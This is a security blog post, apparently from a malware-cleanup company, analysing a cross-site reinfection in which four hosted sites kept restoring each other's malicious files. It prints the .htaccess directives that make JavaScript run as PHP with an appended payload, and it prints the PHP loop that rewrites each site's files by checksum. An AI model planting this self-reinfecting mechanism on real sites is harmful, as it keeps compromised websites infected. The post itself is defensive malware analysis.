The Latest in IT Security

Website Malware – Reality of Cross-Site Contaminations

14
Dec
2012

Sometimes you can’t help but put yourself in the shoes of your clients and skeptics and wonder how many times they roll their eyes at the things you says. Cross-site contamination is one of those things. We first start writing about it in March of 2013 in a little post that got a lot of attention, “A Little Tale About Website Cross Contamination”. In that case we talked to how the attack vector was coming from a neighboring site that had since been neglected, in turn it was now housing the generating payload that was affecting the live sites. All in all, it was a sad and depressing story, this one unfortunately is no different.

In this case, it’s unique in that it’d fall into what we would categorize a targeted attack. That’s right, the complete opposite of what we often tell most readers they fall into, opportunistic attacks. I will caveat that it’s not known for sure yet, but after reading this we’ll let you be the judge.

/* It’s nothing personal, it’s just business */

The Scenario

As is in most cases, a client came through our virtual doors a bit perplexed and flustered. They were suffering a continuous infection problem, no matter what they did the same 4 sites kept being affected. The environment was riddled with other sites, further complicating the case especially if you know how we’re configured. It also so happened that every time we cleared one site, within minutes it’d come right back, almost as if it was laughing at us. Do you realize how annoying that is?

Often in a scenario like this it’d mean there was another payload that was doing the generation, something we were missing. We have even seen it where it’s tied into the systems cron jobs and run at set intervals making it even more excruciating a problem to debug without server root access. Needless to say, none of that was the problem, we were staring the problem the entire time.

This is what it was doing at a high level:

Sucuri - Cross-Site Contamination

Of the various other sites on the server, it picked four sites and it became a self-licking ice cream cone for lack of a better word. What we quickly realized was that you couldn’t just remove one, you had to remove all four at the same exact time, the generation cycle was so fast that by the time we cleared one the other would be back within seconds.

The Details

So obviously the question was how was it doing this, so we dug a little deeper into the payload to better understand this is what we found.

The crux of the payload was in two parts:

  1. .htaccess
  2. 1 Javascript File

The .htaccess was used to load the payload onto the browser, but the real work horse was the JavaScript file it was loading.

This is what the .htaccess contained:

<files ~ “\.js$”>SetHandler application/x-httpd-phpphp_value auto_append_file /path-to-file/js/jquery-mini.jsphp_flag display_errors Off</files>

If you’re not familiar with the directives being used, don’t worry, it’s pretty straight forward.

The <files ~ “\.js$”> is defining the file type – in this case JavaScript. Then it’s saying to handle the JS as PHP, that’s what it is doing here SetHandler application/x-httpd-php. Then it’s actually appending the payload, which is in a JavaScript here php_value auto_append_file /path-to-file/js/jquery-mini.js. And, just in case there are some warnings brought about by the server configuration it’s saying go ahead and turn that off so that no one knows here php_flag display_errors Off.

This isn’t even the fun part yet, the real fun begins in the JavaScript file, this is what it looked like:

Sucuri - Cross-Site Contamination - JavaScript

The first red flag was the use of the opening PHP tags – <?php. It’s a warning because that doesn’t belong in a JS file, but if you recall the .htaccess file it makes sense, it needs the tags as it’s being executed as PHP. Using our free decoder you’re able to quickly breakdown the payload to see what’s going on:

Sucuri Cross-Site Contamination - JS

I truncated it to handle two sites or I’d never get the image into the frame. A couple of areas to pay attention to are the first two arrays:

 array(      ‘name’=>’/path-site-1/.htaccess’,      ‘checksum’=>’4235295951’,      ‘data’=>’7068705f76616c756…..,      ‘jser’=>’/path-site-1/js/jquery-mini.js’     ), array(      ‘name’=>’/path-site-2/.htaccess’,      ‘checksum’=>’3083167236’,      ‘data’=>’3c66696c6573207e20….,      ‘jser’=>’/path-site-2/js/jquery-mini.js’    ),

They array’s by itself isn’t doing anything, at least not until you get here:

foreach ($check as $row) {	chmod($row[‘jser’],0775);	chmod($row[‘name’],0660);	if (crc32(@file_get_contents($row[‘name’]))<>$row[‘checksum’]) echo @file_put_contents($row[‘name’],hex2bin($row[‘data’]));	if (crc32(@file_get_contents($___jser[‘selfname’]))<>crc32(@file_get_contents($row[‘jser’]))) @file_put_contents($row[‘jser’],@file_get_contents($___jser[‘selfname’])); }

This is where it is doing the check. It’s asking, does the .htaccess exist? Does so by checking for the ‘name’array option; verifies it checking its hash, against the ‘checksum’ array. If it exists, its ignored, but if it doesn’t, then it uses the content in the ‘data’ array option in the place of what currently exists. Using the method of comparing hashes is a very quick and effective method to check if anything has changed, just a little tip.

It then does the same thing for the ‘jser’ array. It’s just one giant self-licking ice cream cone. What was really interesting is that the paths were actually hard-coded in the files here:

 ‘name’=>’/path-site-1/.htaccess’, ‘jser’=>’/path-site-1/js/jquery-mini.js’

I obviously replaced the path directory, but this leads us to believe this was a highly coveted targeted attack. Not because we wish them on anyone, but because they are always fun to analyze.

Now, imagine that same process across all four sites. They each contained the same payload and the only way to remove it was to delete them all at the same time, deleting one would only generate the next pair.

The Payload

Let’s not forget, after all that the real intent was to drop a payload on the visitor’s browser. The target being 4 distinct websites. At the very bottom of the JavaScript file you find its real intent:

if(!function_exists(‘hex2bin’)) {	function hex2bin($h)	 {		if (!is_string($h)) return null;		$r=”;		for ($a=0;$a<strlen($h);$a+=2) $r.=chr(hexdec($h{$a}.$h{($a+1)}));		return $r;	 } }

It’s looking for the hex2bin function which is here:

Sucuri Cross Site Contamination hex2bin Function

When you go to decode it you get this after the first level of obfuscation, this one you’ll need to do a little leg work:

Sucuri Cross-Site Contamination

And after one more layer of decoding you finally get to the intended payload:

Sucuri Cross-Site Contamination

To help decipher through it this is what really matter from that image:

Sucuri Cross-Site Contamination

If you’re curious what that is doing then you might be interested in my last post about SEP Attacks and Link Farms. Same exact thing.

Full Circle

In the past we focused on the impacts of cross-site contamination as they pertain to attack vectors, but what we hadn’t discussed was how more sophisticated attacks can be wired together in a scenario like the one described here.

It was actually ingenious and very simple to implement. The challenge however was that although simple to implement, it was difficult to detect. There were no other components that would have flagged it, to the average user this would have been an exhausting process. The fastest method to finding the different payloads would be to reverse engineer the payloads until you go to the first layer that very clearly outlined the path and files. You’d then have to remove each one at the same time, best done using the command line interface via a tool like NCFTP or shell.

Leave a reply


Categories

SATURDAY, APRIL 20, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments